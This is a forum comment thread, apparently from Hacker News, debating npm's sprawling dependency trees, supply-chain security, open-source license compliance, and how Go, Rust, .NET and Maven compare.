By adopting any semblance of a modern front-end stack, you're going to be pulling in a huge dependency tree. So, your choices are:

A) Don't do modern front-end development. This, despite being very popular with the HN crowd, is a challenging option. Losing the power of popular frameworks makes it difficult to recruit new developers, slows down developer velocity, and can cause tech debt to accrue more quickly.

B) Validate every dependency. For a skilled security reviewer, this may be possible. For an average developer however, reviewing thousands of dependencies is unlikely to be a good use of time. There are some improvements, automated tools that can be run, but the unfortunate reality is that the NPM attack surface is massive and I don't know of any techniques for producing any truly reliable security assessment.

C) Depend only on packages that you trust and trust them to validate their dependencies. Obviously, if this transitive trust breaks down at any layer then a vulnerability is introduced.

In practice, I've only ever seen individuals and companies do C. I think if there was some tooling around B, that would be the best option. I see a lot of room for disruption here - if there was a way to assign trust to a dependency and then a package-manager level construct that would only allow trusted dependencies to be installed, that might work.

I think the ship has sailed on A.


"Sure I might be running unreviewed code from dozens if not hundreds of unknown entities on my and my users devices, but it's important not to get caught violating a license !"

I've been involved with software development for over 20 years in various capacities, and the npm culture is absolutely the worst in terms of irresponsibility and could be effectively used to argue for the need of regulation of the software industry.


I'm not a web dev, not a JavaScript fan, but out of pure curiosity I've been playing with the idea of doing my next side project in node, just to get an idea of what modern Js feels like.

But the whole dependency hell, left-pad and the likes are a real turnoff. So what I'd probably end up with is coding in pure Js without a package manager or "build system". Basically like you did PHP in the 90s. The question is whether I'd end up with anything remotely sane (already assuming it doesn't involve any crypto or similarly complex).


Modern JS is TypeScript.

Also Yarn is very handy. (Fast, simple, correct.)

If you need leftPad, maybe just "vendor" it manually.


Modern JS is the current ECMAScript standard. Typescript is not "modern JS", any more than Coffeescript was, any more than the compile-to-js language that will probably replace it in a week.

You're confusing the tool for the language the tool operates on, akin to claiming modern C++ is Visual Studio.


One thousand yes to this!

Coffee-script was obviously always a fad. It basically traded legibility for ergonomics. Adding nothing of particular value to maintainability and longevity.

TypeScript otoh is just ES with types. It moves in the completely opposite direction, adding just enough syntax to get a proper type system in place (a pretty good one to boot).

If anything I would expect it’s syntax additions to be adopted as the standard and directly supported by runtimes. Despite static typing not being that useful for interpreters.

Unless runtimes will completely phase out es, focusing on wasm. (But that will take decades, so not really an either or thing)


Not using TS means leaving a lot of useful tools on the floor.

The ECMAScript standardization is process is invaluable, after all TS builds upon it. But TS provides a saner subset (and adds a very productive type system), without that I wouldn't touch "modern" JS even with a stick.


What do you mean with TS provides a subset of JS? TS is actually a superset of JS.

Quoting the TypeScript website:

> TypeScript is a typed superset of JavaScript that compiles to plain JavaScript.

https://www.typescriptlang.org/


JS the good parts + types.

My point was that TypeScript includes ALL of JS (the good and the bad parts).

There is not a single feature from JavaScript that TypeScript removes.


I tried vanilla JS three years ago. It got so tedious after just one page that I decided to try and use Elm instead. I have not regretted it once. In contrast to the hacky Npm ecosystem, Elm feels like I'm working with somebody who values my mental sanity a great deal.

It’s slowly expanding, but JS has an anemic standard library. The node platform adds a little, but yo’re still miles away from a typical standard library like Java or python.

If you want to have 0 dependencies, you will have to write a lot of code to do things that would just be a line or two in most other languages.


I have long hoped Nodejs has a "standard library" of its own

The problem is not with anemic standard library. The problem is with lack of commonly accepted set of libraries. Java is not so good. You can't even copy one stream to another in Java 8. There's no built-in DI. There's no built-in ORM. Even built-in logging is so bad that everyone uses something different. Hell, no built-in JSON in 2019. But there's set of community-adopted libraries and everyone's using them. You need more utility methods? There's Guava (and, sometimes, apache commons). There's no left-pad library. You need DI? There's Spring. You need ORM? There's Hibernate. You need logging? Well, here's some competition between logback and log4j and that's about it. And even that competition has plenty of adapters which allows to write library code that works fine with both.

So JS community should throw left-pad in the window and declare underscore.js as a library of choice, so every other library will depend on it and that's about it.


It is certainly possible to do JS development in a more controlled way.

My advice is to avoid most of the JS build tools (i.e. grunt, gulp) by using npm scripts (basically shell commands defines in `package.json`) to trigger build actions, or to start smaller, more specialised tools. At least then you will understand how your build works and won't have an extra layer of buggy plugins screwing things up.

Also being conservative and critical of the dependencies you take on is a great idea. Many smaller dependencies are not worth it. Bigger popular libraries like lodash are often a better deal. Unfortunately this micro-module philosophy and "publish random trash to npmjs.com" attitude has created a huge amount of crud packages.

I've had success organising a bigger project into multiple node packages inside the same git repository and using yarn's workspaces feature to tie it altogether. I avoid the complexity of publishing those (private) packages on npmjs.com. yarn's workspaces make it possible for my main app to find its (internal) package dependencies in the same git repo. is certainly possible to do JS development in a more controlled way.

My advice is to avoid most of the JS build tools (i.e. grunt, gulp) by using npm scripts (basically shell commands defines in `package.json`) to trigger build actions, or to start smaller, more specialised tools. At least then you will understand how your build works and won't have an extra layer of buggy plugins screwing things up.

Also being conservative and critical of the dependencies you take on is a great idea. Many smaller dependencies are not worth it. Bigger popular libraries like lodash are often a better deal.

I've had success organising a bigger project into multiple node modules inside the same git repository and using yarn's workspaces feature to tie it altogether. I avoid the complexity of publishing those (private) modules on npmjs.com. yarn's workspaces make it possible for my main app to find its (sub-)module dependencies in the same git repo.


I have a project with a build system that is basically cat src/js/* > dist/bundle.js , it's refreshing when you have to deal with setting up webpack at work.

No, you are basically right, but the number of nodes in the dependency tree doesn't really mean that you really have to review all of those. Usually you end up with a big basket of actual dependent projects, and with some versions for them (which leads to the big explosion of the number of nodes in the dep tree).

Naturally it should be easy to specify a whitelist of licenses. (Of course then one has to decide whether to trust the package.json-s.)

That said, security review is hard for any ecosystem. Go probably has inherent advantages compared to the JS ecosystem, simply by virtue of being younger, having a real standard library, being more focused (no browser vs nodeJS issues) etc.

PS: there are projects that aim to do collaborative audit/review for Rust ( https://github.com/crev-dev/cargo-crev ) there should be something like that for the JS world. also there's the NPM "report vulnerability" feature.


Dependencies are cattle, not pets. There's nothing wrong with having zillions of them; what you need is good tools to manage them in bulk.

In the JVM ecosystem, projects are only allowed in the Maven Central repository if they have their license documented in a machine readable fashion there; it's then trivial to check what licenses you're depending on (and there are several plugins available for doing so). I'm amazed other ecosystems don't offer the same.


This protects you against licences you don't expect, but not against malicious or subverted dependencies.

Since a dependency can generally do anything your application has privileges for, widely depended-on libraries are an attractive target. A cattle approach means more dependencies, and it being easier for new ones to sneak in.


> Dependencies are cattle, not pets.

It depends on your context. Sometimes, dependencies are not pets, but weights on your airplane.


> There's nothing wrong with having zillions of them...

There's nothing wrong until something goes wrong an now you're royally screwed. With zillion dependencies you are at a mercy of zillion maintainers, and none of them has any obligation to you. They can break backwards compatibility in patch releases, introduce subtle behavior changes, steer the project in an unexpected direction or abandon it altogether.


I’m a bit torn on this. I have most of my experience in the .NET ecosystem, where dependencies are a lot more manageable. However, if something breaks, you’re screwed a lot harder, because it’s not so easy to replace a large library, and there are very likely fewer well-maintained alternatives than there would be on NPM.

In total, I find it hard to deny how productive the NPM ecosystem can be, despite my philosophical objections to the way the community is run. Am I crazy here?


You aren't alone in this. The Node/NPM/JS scene is churning out code and innovations like there's no tomorrow, that's something to admire.

What I feel they are missing is a community process to consolidate things. You don't need three generations of ten incompatible solutions for a given problem - after some iterations, things should consolidate into one or two more or less standardized libs that don't break existing code at every damn point release.


> You aren't alone in this. The Node/NPM/JS scene is churning out code and innovations like there's no tomorrow, that's something to admire.

I don't find churning out code admirable, and I also don't think I've seen any true innovation come out of the NPM scene (bar innovation in the browser/JS space itself, which I think isn't a good measure as it's mostly just working around limitations that shouldn't be there in the first place).


That goes into the direction of my thinking. I am concerned about transitive security issues. It is impossible to check in node dependencies into version control (size/binaries). They have a lock file to pin versions, but dependencies that are downloaded upon each build are are not reproducible from my point of view. With Go, it’s easy to vendor and check in, it’s also straight forward to review them. There have been examples of targeted attacks using npm packages and that is something I am very concerned about.

People move billions with a node.js application we develop and the company will eventually be liable if the system is compromised through a targeted attack.

On a different note, I think the ecosystem moves too fast, packages and versions are getting deprecated and new ones getting released constantly. I have the feeling that the whole ecosystem is targeted towards building small MVP apps, not relying a long-term business on it. Maybe I am too harsh here, but that is a frustration growing for years now. I am happy to be proven wrong.


Not a huge fan of node or anything but npm lock files do pin to a hash. Also in commercial world you're going to be pulling through nexus or some other cache to reduce bandwidth use and developer downtime.

Are there other reproducibility concerns I should be worrying about? Are you thinking npm modules with native code or that (this does happen!) actively pull other stuff during build? Most of those do their own pinning but agree the whole thing is messy.


In that case the npm ecosystem has some serious bovine spongiform encephalopathy risks to manage

> There's nothing wrong with having zillions of them

That is a scary point of view. We have forgotten that there is no such thing as a zero-cost abstraction, apparently, and shovelware developers are now employed by enterprises and write enterprise software...

CPUs aren't getting faster. Software is getting slower a LOT faster than hardware is getting faster, these days, and people are still apparently perfectly fine with adding dependency upon dependency upon abstraction upon abstraction and it's adding up extremely quickly.

A good first step to addressing this is to favor a small copy & paste operation over a small dependency. Lots of people will shriek at the idea of this, but I promise you, all the problems with copying and pasting code are nowhere nearly as severe as all the problems with dependencies. Working to avoid problems you don't have results in creating problems that you definitely do have.


The comment you're replying to makes references to the JVM, which is not surprising given what I've seen in the Enterprise Java culture.

> Dependencies are cattle...

... Which also happen keep their own cattle that you're still responsible for.

It's not so bad in languages with solid standard libraries. In Python projects I might have 20 direct deps, ~50 indirect.

In a real JS project I'm building, I have 17 direct, 3829 indirect. The JS standard library is so damned thin that everything pulls in some random version of the kitchen sink.

    yarn list | sed -E 's/.*- //' | sort -u | wc -l  # minus 2
In situations like that your job of auditing licenses, updates, sec issues, etc balloons exponentially with each new dependency.

Tooling should absolutely be used, but it still doesn't perform the job of working out whether or not you want to upgrade a component, or whether or not you're likely to have suffered a security breach, or how to report on how well audited your dependencies are.


"Servers are cattle, not pets" relies on the servers being substantially identical, cloned like bananas from a single source where each is as good as the other.

Dependencies are, if they are to be useful at all, all different. Dependencies are suppliers, in the business sense. Having lots of dependencies loaded at runtime is like a modern just-in-time giant supply chain; it lets you take advantage of efficiencies in exchange for being more brittle.

Or they are like BOM items on a circuit board. Part of the original drive to "componentise" software came from people experienced in electronic engineering; you don't have to reinvent the transistor, you just buy them at a cost of a few dollars for a reel of thousands. But experienced designers will still try to:

- choose more-common components wherever possible

- ensure there are multiple sources for a component

- reduce the overall number of BOM lines, which reduces supply risk and inventory cost

The software world would go completely bananas if the cost for dependencies was not exactly zero. Imagine having to license left-pad.


> Dependencies are cattle, not pets.

That doesn't make any sense. That analogy works for mostly-identical computers, where if your software won't run on one computer you can just use another mostly-identical computer.

Almost by definition dependencies are not interchangeable. You can't replace a routine to pad strings with a routine that is a web server. Or a matrix multiplier. Even dependencies that do the same overall job almost never have the same API. Heck, even the same dependency often ends up with a different incompatible API over time as versions change.

> There's nothing wrong with having zillions of them; what you need is good tools to manage them in bulk.

Every added dependency is a risk. Each unintentional vulnerability in each dependency increases the number of vulnerabilities that might be exploitable in your system. And that's just the unintentional vulnerabilities.

Practically all systems provide no useful sandboxing between dependencies, so if any one of your transitive dependencies is malicious, then your entire system is malicious.

Every new dependency also brings in potential license issues, per this article. I think it's unacceptable to have a scarefest about the AGPL, GPL, or LGPL; for a vast number of applications those licenses are just fine. The bigger risks are software that has no license at all, which are a legal risk for any project that uses them until governments change international treaties involving copyright (which is not likely any time soon). But it's certainly true that various licenses are not acceptable for certain situations, and every new dependency increases the risks of licensing problems.

Having no dependencies is absurd; it's uneconomic to build everything from scratch. But every time you add a dependency you need to think about the trade-off; it is sometimes wise to not reuse something.


Does Maven Central also require machine-checkable proofs of security?

No (and I don't think any code repository does or could; what would a "proof of security" actually prove?). It does require machine-checkable signing of all releases.

The opposite of this is true.

> what you need is good tools to manage them in bulk

How do you manage reputation and relationships in bulk? There are transactional costs here. Dependencies created by maintainers with impeccable reputations are a much smaller risk than arbitrary dependencies created by arbitrary maintainers.


You require releases to be signed by maintainers (again, something maven central enforces and other repositories ought to), and then you have a notion of maintainer identity and can decide which you trust (again something that plugins let you do). If there are still too many maintainers then you can use the GPG web of trust approach, as e.g. Debian does, and see which maintainers are part of trusted organisations.

Seems like negative comments about npm are getting shadowbanned here, so let's try again: npm-based software engineering culture is utterly irresponsible and should be viewed as a liability for both a company and its users.

The npm dependency model is a nightmare. All the more shameful given that it's backed by a for-profit entity that charges its users.

Please don't post vague flame bait.

My biggest issue with the massive dependencies is not licensing or security. Both are important, but there is an even bigger block.

My biggest issue is with things in the node ecosystem is breakage, especially React libraries. I was following a NetNinja tutorial series on Youtube. I had to use a Firebase-Redux library for a combined React/Redux/Firebase series. There was a security vulnerability with something down the stack only a few months after the tutorial was out. So to use the updated version I had to use the beta version of a Firebase library which broke the tutorial code despite the library change being a point release like 1.4.0-beta2. Either 1.3.0 to 1.4.0 or 1.2.0 to 1.4.0 would be consider a breaking release for this particular dev.

We have a large group of dependencies chained upon each other with maintainers that have different support commitments and styles. React might be the de facto JS system, but it relies on a large system of these 3rd party packages to do deeper functionality which can so easily break things. I already had to peg React itself to an older version to use this tutorial when it was months old.

I realized at this point how much of a pain it would be to maintain this code in my portfolio if I did something with it. Let alone a paid product. I stopped learning React at this point (or at least learning React+Redux+Firebase).

Ruby sorta has this issue too, but it feels the Node ecosystem is much more accelerated. The Rails framework dominates the gem ecosystem so much usually gems break functionality by the version of Rails they support. So gems often will not update or warn of breaking changes based on the Rails version or ActiveRecord which follows Rails versioning. This makes gem dependencies much more manageable.

The node ecosystem does not have a large dominating framework like Rails. Even if you considered React that framework, Facebook breaks it whenever they please. 16.4 which sound like a minor version update break things. While Rails 4.2 was supported for 4 years. jQuery might be years before it breaks support.


Rust is on this path as well, the small standard library pretty much forces people into using a ton of tiny dependencies. Compiling a rust project is exactly like using npm and seeing a never ending list of deps

It is also difficult to know which dependencies have unsafe code. There's good discussion about it on reddit: https://www.reddit.com/r/rust/comments/ekpa3i/is_anyone_conc...

The underlying problem is the lack of curation. Micro-dependencies that are widely used and have been reviewed for quality should be promoted to a group of standard packages. They'd still be dependencies like any other but they'd be officially maintained and installed by default.

Another problem with npm: every package gets its own copy of its dependencies. Not sure if Rust does that.


Cargo de-duplicates packages as much as possible, and only includes multiple copies if there are multiple incompatible versions required.

> every package gets its own copy of its dependencies. Not sure if Rust does that.

It does something halfway in between, which is still a security liability.


IMO the main problem with Rust is that it's tied to cargo, which tries to link in multiple versions of the same crate.

I don't think the NPM ecosystem is in a great security position, but the pushback I'd make here is that you should be reviewing your Go dependencies as well.

If you're looking at the NPM ecosystem and saying, "the number of dependencies is problematic because it takes a long time to review them", I agree with you. If you're looking at the Go ecosystem and saying, "there are fewer dependencies, so I don't need to review them", then that's a security antipattern.

The better way to phrase this to your team is that you need to review dependencies, period. The NPM ecosystem isn't problematic because it introduces a new requirement to review dependencies, it's problematic because reviewing dependencies is harder. You can use NPM all you want for security-sensitive code. You just have to spend the extra time to review dependencies, which means bringing in new dependencies will be much slower than in a shallower ecosystem like Go's.

That's the point of OP's article. You can't skip reviewing dependencies in any ecosystem, in part because all of our ecosystems across the board have crap sandboxing and permissions, but also because of license issues and quality issues like the author found. There is no shortcut for that, whether you're using Ruby, Go, Python, whatever. You have to review your dependencies.


"the number of dependencies is problematic because it takes a long time to review them"

The dependencies themselves are generally smaller and more self-contained. Arguably it is easier to review since the side effects and cross-module behaviors are much more pronounced (it's generally deemed a "bad thing" by the community for modules to make unnecessary global actions)


I read the GP post as saying that having fewer dependencies makes reviewing them easier, not that one need not review them?

My point being that "NPM is bad for security" is probably the wrong take to convince a software team to avoid the ecosystem.

Instead, phrase it as, "well obviously we need to review our dependencies, so why use an ecosystem where that's hard?" Don't phrase it as a security problem, phrase it as a development time and overhead problem.

Or better yet, let your team use NPM as long as they review the dependencies, and if your dependency tree is really a problem, your team will naturally become annoyed by the extra work and will avoid large dependencies on their own without a lot of extra prompting.


> Nobody except me seems to see a problem there, despite me being able to point out specific security incidents.

The npm model is a shitshow (multiple versions of one dependency). People defend it for obviously self-interested or lazy reasons.


>Nobody except me seems to see a problem there, despite me being able to point out specific security incidents.

This seems to apply to security in general. Security these days is doing the minimum amount needed to check some boxes that you are now secure. I suspect a lot of this is driven by incentives. There is few negatives to an individual to use bad security over good security, and the costs of good security means less of the 'good stuff' being developed which results in worse reviews and less prestige. And if people are hacked, the blame is primarily placed on the hackers with little danger to the developers and often even less danger to the company (they might have to spend 5% of the budget they saved on PR to repair their image).

I'm not sure how to fix the issue with prioritization of security. My first guess would be by changing the incentives to companies so they bear the liability in identity theft instead of the user (the very concept of identify theft is a trick to blame the end consumer instead of either the business leaking data or the business giving away money without verifying if data is accurate).


They both have flaws. NPM due to the cascading mass of transient dependencies; go (historically) due to pulling dependencies from the master branch of a repo. All of those can change from underneath you.

In any case you can’t avoid proper auditing and pen-testing. Even if your app code is rock solid, it doesn’t mean your infrastructure is safe. Or even your office building or the data centre serving the code. Or your employees and their credentials.

All it takes is a decision to use mongodb or redis without auth and to expose the ports to the internet, and the most secure runtime in the world won’t save you then.

Or a bit of social engineering so the attacker is making perfectly legit requests in your perfectly secured app.


I am doing similar analysis within my company. While I usually never dig that deep asking why something is AGPl or GPL, the amount of careless managed dependency trees within the NPM ecosystem is astonishing. It is not only about licenses, but also code quality and vulnerabilities.

I came to the absolute same conclusion as the author: focus on platforms where there is a reasonable standard library. That is .NET in my case and Go in his case. These product dependency trees are much (much) cleaner.

I ended up with writing software to analyze the dependency trees licenses for our browser based products


> The bulk of my trust is consolidated in the Go project, and thanks to their stellar reputation and solid operating procedures, I don't feel a need to review the source code of the Go compiler and standard libraries.

Well... I have reviewed the Go runtime, after I ran into a bug in it... And that's one of the reasons I no longer use Go unless forced to. That thing is ugly under the covers. There is seriously quite a bit of insanity and poor design going on, e.g. when they did the ARM port they had to make a ton of changes to data structures/functions to include the link register, because they didn't or couldn't abstract out architecture specific tidbits like that. Also, the whole C interop stuff is nuts with a ridiculous call chain and several stack switches every time you call to or from C code (this is where I found the bug).

Not saying people shouldn't use it, but I wouldn't hold the deep guts of Go up as an example of stellar development practices. Maybe all the stdlib stuff on top is prettier, but the runtime sure isn't.


> That thing is ugly under the covers.

Was the code you looked at in Go 1.5 and above? Is it cleaner in 1.4? They used automated tools to convert the C code into Go for 1.5.


They were halfway through the process when I made my contribution, and in fact I had to rewrite it in Go. The Go version was just a straight conversion; being Go didn't make it inherently cleaner.

I think his point is that it stands to reason that machine-converted C?Go code may be pretty ugly. Maybe it was better when it was clean, Plan-9-style C? Maybe it is better now, after some number of years of cleanup?

So would you use?

I ran into a speed issue last year messing around with Go RSA keys. Turns out it's an open bug. Even though fixes have been made (see links in the thread), it's not a global fix and Go ciphers can be absysmally slow.

https://github.com/golang/go/issues/20058

The recommended fix is to use a library like this one. However, that means your containers blow up with complicated dependency trees so it's not really a good solution for a distributed container architecture (eg Kubernetes).

https://github.com/ncw/gmp

I love working with Go because of its simple binaries and small containers, but there are some things that it just does not do well.


I don't know if using gmp for RSA is a good idea. I am pretty sure that gmp would open you to side channel attacks due to its operations not being constant time.

GMP has constant time functions for the relevant primitives you'd need to implement RSA (notably, constant-time/space modular power functionality). You'll probably still fuck it up completely anyway if you're doing it yourself, but not because of that.

I abandoned the project because I couldn't find a reasonable solution using standard Go libs that worked in a reasonable timeframe. The bottleneck is this function.

math/big.addMulVVW

There was some work on it recently.

https://go-review.googlesource.com/q/addMulVVW

But I feel like this issue might have been ignored.

https://go-review.googlesource.com/c/go/+/164966

It might be addressed in Go 1.14 (although it's been marked as Backlog since I last looked at that issue).

https://github.com/golang/go/issues/32492

Point being Go, like OP of this thread suggests, has some issues. This is, to me, a critical flaw preventing my teams from using Go as a primary web language. It is both consistently faster and consistently timed to make an external call to, say, gpg2 to generate a key than it is to use the opengpg lib that relies on math/big. That's nuts.


The standard library is generally very well designed and has good practices with the caveat that you should stay away from encoding/*, there be dragons.

The problem is reviewing dependencies is labor-intensive, thus expensive. The economics would justify that being a paid service, like UL/TÜV certification for electronics, but most companies don't actually care enough about security to pay for such a thing.

And also very important to watch for changes of your dependencies, as they can be quite dynamic. A single review too early or too late in the development process may have misleading results. Watching for commit changes is too time consuming, so watching for releases is a bit easier, especially if you use something like https://newreleases.io or other similar sites.

Slightly related: I have created this useful tool called vendorlicenses that allows you to check and concatenate licenses on Go programs (to give credit on a CLI "legal" command).

It will only work if you are vendoring your packages though (and you should!).

https://github.com/henvic/vendorlicenses


okay , great advice .

> Aside: this is why I don't like to accept pull requests that move code around. Even if the new code organization is better, it's usually not worth the time it takes to ensure the pull request isn't doing anything extra.

This sounds like a solvable problem no one has bothered to solve. We need an analogue of diff highlighting for move-around changes, ideally one that decomposes a changeset into the coarsest block partition such that the changes boil down to a permutation of the blocks.

Something similar should be done for merge commits, which at the moment are completely undebuggable.


For changes that are a pure file rename 'git mv' tracks those pretty cleanly. Anything beyond that... I don't know of any good tooling either.

git mv doesn't actually do anything special to track moves, so it can't figure out anything that's non-trivial.

Mercurial goes a bit further by tracking copies, so if you split a file in two, a diff viewer will show there is no added code (but a lot of deletions). https://stackoverflow.com/a/4156146/539465

NPM ecosystem has quite similar situation.

A lot of popular packages being used in complete contravention to their license terms, and care not at all their dependency chains pulling quite restrictive licenses.


> It started off poorly when I noticed some Brown M&M's: despite being a library, it was logging messages to stdout

In many language ecosystems, logging to stdout tends to be the right thing to do in a lib as it does not impose any specific choice of logging implementation.

One always can recapture stdout and route it through one's logging solution of choice; doing something analog with an extraneous logging library can be harder if not unfeasible.

Are things different in Go land?


In what language or environment would recapturing and routing stdout be a desirable solution? Seeing that without a really good explanation would concern me. That's a global hack with fun side effects that can lead to very confusing bugs. Also, you would lose which library is which log if you have to do this for more than one library.

In Go, I would assume that a library that needs to log would do one or more of the following a) offer the ability to disable logging b) offer overriding the output that it uses for logging probably with an io.Writer interface or something c) accept a log.Logger or offer an interface that something like log.Logger meets. Ideally it would offer an interface that supports some key-value meta data to be able to have nicely structured logs with formatting independent of the library.


logging to stdout prevents any sort of systematic parsing or handling of stack traces, package names, or error levels, cause people are going to dump whatever shit they personally find most useful onto stdout and everyone's going to use a different format. That is a far far more "analog" solution than using any logging API... or even multiple ad-hoc logging APIs.

The idiomatic solution is to have a standardized facade like SLF4J and then behind the scenes the "end user" (final developer writing the application) can choose their own logging backend to drive the facade.

The slightly less idiomatic way is that everybody does their own thing and then you use bridge libraries to hijack all of the various logging APIs and redirect them through SLF4J or through your logging backend of choice.


As a library, if you just have to avoid logging frameworks, at least log to `stderr` so you don't break tools that parse output.

Johnny come lately but is that true of the AGPL, that merely linking to agpl code infects your code? No modification to the agpl code needed to trigger the clause?

What is the point of having a license like that? Trolling?


Yes, that is generally how copyleft (GPL) software works. Linking against it confers a requirement that your source also be distributed under a compatible license. This is why it's called a "viral" license.

AGPL was intended to close the SaaS gap in copyleft software. Essentially, prior copyleft provisions don't kick in if you never distribute the software itself, so if you only offer network interaction with the software you have no duty to redistribute.

AGPL is intended to restore the freedom of end users to have access to the source of the software they interact with, even if it lives on someone else's computer. As with all copyleft software, it does this by restricting the rights of the developers of the software (to keep their source proprietary).

As always, it is the old philosophical split between MIT/BSD style licenses and GPL style licenses. MIT/BSD provide you with complete freedom, including the freedom to use that library and keep your source closed. GPL is intended to prevent that and to build a common base of software on which further things can be built.

(there is also Lesser GPL license, which only kicks in for modifications to the library itself. So if you write something that uses a LGPL library, you don't have to give away source for the larger program as a whole, just the LGPL program and any modifications you made to it. This is essentially removing the "viral" copyleft provisions.)


On the licensing front, one thing that has really helped me is adding a script to my build / CI process that scans every package I'm dependent on for a LICENSE / COPYING / etc. file and then runs through a set of dumb fingerprints to match on different licenses for a combined whitelist / blacklist approach. Packages with no recognized license file or license are rejected. Then it spits the licences out into a map[string]string in a file where the Go package maps to the license string which gets served up on its own HTTPS endpoint to keep in compliance with copyright notice requirements.

In case it's useful to anyone else, here's an older copy of it: https://gist.github.com/robmccoll/240317eceb73e3f4e29ea662e3...


I completely agree that you should run 1+ license checkers in your CI process, just like you should check anything else in your CI process that you care about.

In the CII Best Practices badge project we use both the "license_finder" program (which is an OSS tool) and the FOSSA service ( https://fossa.com/ ). Both examine the dependencies for licensing issues. While something could still slip through, it's much less likely, and more importantly we have a really good case for showing due diligence. I'm not a lawyer, but I do know that courts look very favorably on people who are demonstrably making an effort to meet their legal obligations. You're way less likely to have legal problems that way.


"I just finished writing a vastly simpler, attestation-free library which is less than one tenth the size (I will open source it soon - watch this space)."

...

"Even though I love Rust, I am terrified every time I look at the dependency graph of a typical Rust library: I usually see dozens of transitive dependencies written by Internet randos whom I have zero reason to trust."

I have some kind of point to this comment, but I'm trapped in a sudden feeling of professional malaise.


Legal | privacy